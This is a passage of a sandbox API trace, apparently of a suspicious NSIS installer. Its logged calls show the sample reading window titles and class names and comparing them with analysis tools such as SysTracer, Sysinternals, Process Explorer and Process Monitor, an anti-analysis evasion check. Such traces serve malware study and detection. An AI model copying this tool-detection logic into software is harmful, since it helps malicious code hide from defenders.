returned="Call" [0158.583] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.583] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.583] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.583] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.583] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") 
returned="strstr" [0158.583] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.583] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.584] lstrcpynA (in: lpString1=0x340df8, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.584] lstrcpynA (in: lpString1=0x3401e0, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.584] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.584] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.584] lstrcpynA (in: lpString1=0x340df8, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.584] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.584] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.584] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.584] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.584] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.584] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.584] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.584] lstrlenA (lpString="0") returned 1 [0158.584] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.584] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", 
iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.584] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.584] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.584] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.584] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.585] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.585] lstrlenA (lpString="0") returned 1 [0158.585] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.585] lstrlenA (lpString="") returned 0 [0158.585] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.585] lstrcpynA (in: lpString1=0x337684, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.585] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.585] lstrlenA (lpString="3399936") returned 7 [0158.585] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.585] lstrcpynA (in: lpString1=0x40a418, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.585] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.585] lstrcpynA (in: lpString1=0x337acc, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.585] lstrcpynA (in: lpString1=0x432800, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" 
[0158.585] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.585] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.585] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.585] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.586] lstrlenA (lpString="") returned 0 [0158.586] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.586] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.586] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.586] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.586] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.586] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.586] lstrlenA (lpString="") returned 0 [0158.586] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.586] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.586] lstrlenA (lpString="") returned 0 [0158.586] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.586] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.586] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.586] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.586] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.587] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.587] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.587] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.587] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.587] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.587] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") 
returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.587] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.587] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.587] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.587] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.587] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.587] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.588] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.588] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.588] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.588] lstrcpynA (in: lpString1=0x3401e0, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.588] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.588] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.588] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.588] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.588] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.588] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.588] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.588] lstrcpynA (in: 
lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.588] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.588] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.588] lstrlenA (lpString="0") returned 1 [0158.588] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.588] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.588] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.588] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.589] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.589] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.589] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.589] lstrlenA (lpString="0") returned 1 [0158.589] lstrcpynA (in: lpString1=0x33723c, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.589] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.589] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.589] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" 
[0158.589] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.589] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.589] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.589] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.589] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.589] lstrlenA (lpString="3399936") returned 7 [0158.589] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.589] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.589] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.589] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") 
returned="Call" [0158.590] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.590] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.590] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.590] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.590] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.590] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.590] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65698") returned 5 [0158.590] lstrcpyA (in: lpString1=0x430400, lpString2="65698" | out: lpString1="65698") returned="65698" [0158.590] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.590] lstrcpynA (in: lpString1=0x33723c, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.590] lstrcpynA (in: lpString1=0x430000, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.590] lstrcpynA (in: lpString1=0x42e3a0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.590] lstrlenA (lpString="callback1") returned 9 [0158.590] lstrcpynA (in: lpString1=0x40ac18, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.590] lstrcpynA (in: lpString1=0x40b018, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.590] lstrcmpiA (lpString1="callback1", lpString2="callback1") returned 0 [0158.590] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") 
returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.590] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.591] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.591] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.591] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.591] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.591] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.591] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetWindowText(p r1, t.r2, i1024)", iMaxLength=1024 | out: lpString1="user32::GetWindowText(p r1, t.r2, i1024)") returned="user32::GetWindowText(p r1, t.r2, i1024)" [0158.591] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.591] lstrcpynA (in: lpString1=0x40a818, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.591] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.591] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.591] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.591] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.591] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.591] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.592] lstrcpynA (in: lpString1=0x341200, lpString2="65698", iMaxLength=1024 | out: lpString1="65698") returned="65698" [0158.592] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.592] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.592] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.592] GetWindowTextA (in: hWnd=0x100a2, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.592] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.592] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.592] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.592] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65698") returned 5 [0158.592] lstrcpynA (in: lpString1=0x42e3a0, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.592] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.592] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.592] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.592] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.592] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.592] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.593] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetClassName(p r1, t.r3, i1024)", iMaxLength=1024 | out: lpString1="user32::GetClassName(p r1, t.r3, i1024)") returned="user32::GetClassName(p r1, t.r3, i1024)" [0158.593] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.593] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.593] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.593] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.593] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.593] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.593] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.593] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.593] lstrcpynA (in: lpString1=0x340df8, lpString2="65698", iMaxLength=1024 | out: lpString1="65698") returned="65698" [0158.593] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.593] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.593] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.594] GetClassNameA (in: hWnd=0x100a2, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.594] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.594] lstrcpynA (in: lpString1=0x341200, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.594] lstrcpyA (in: 
lpString1=0x430c00, lpString2="tooltips_class32" | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.594] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65698") returned 5 [0158.594] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.594] lstrlenA (lpString="0") returned 1 [0158.594] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.594] lstrlenA (lpString="tooltips_class32") returned 16 [0158.594] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.594] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCEXPL", iMaxLength=1024 | out: lpString1="PROCEXPL") returned="PROCEXPL" [0158.594] lstrcmpiA (lpString1="tooltips_class32", lpString2="PROCEXPL") returned 1 [0158.594] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.594] lstrlenA (lpString="tooltips_class32") returned 16 [0158.594] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.594] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCMON_WINDOW_CLASS", iMaxLength=1024 | out: lpString1="PROCMON_WINDOW_CLASS") returned="PROCMON_WINDOW_CLASS" [0158.594] lstrcmpiA (lpString1="tooltips_class32", lpString2="PROCMON_WINDOW_CLASS") returned 1 [0158.594] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.594] lstrlenA (lpString="tooltips_class32") returned 16 [0158.594] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.594] lstrcpynA 
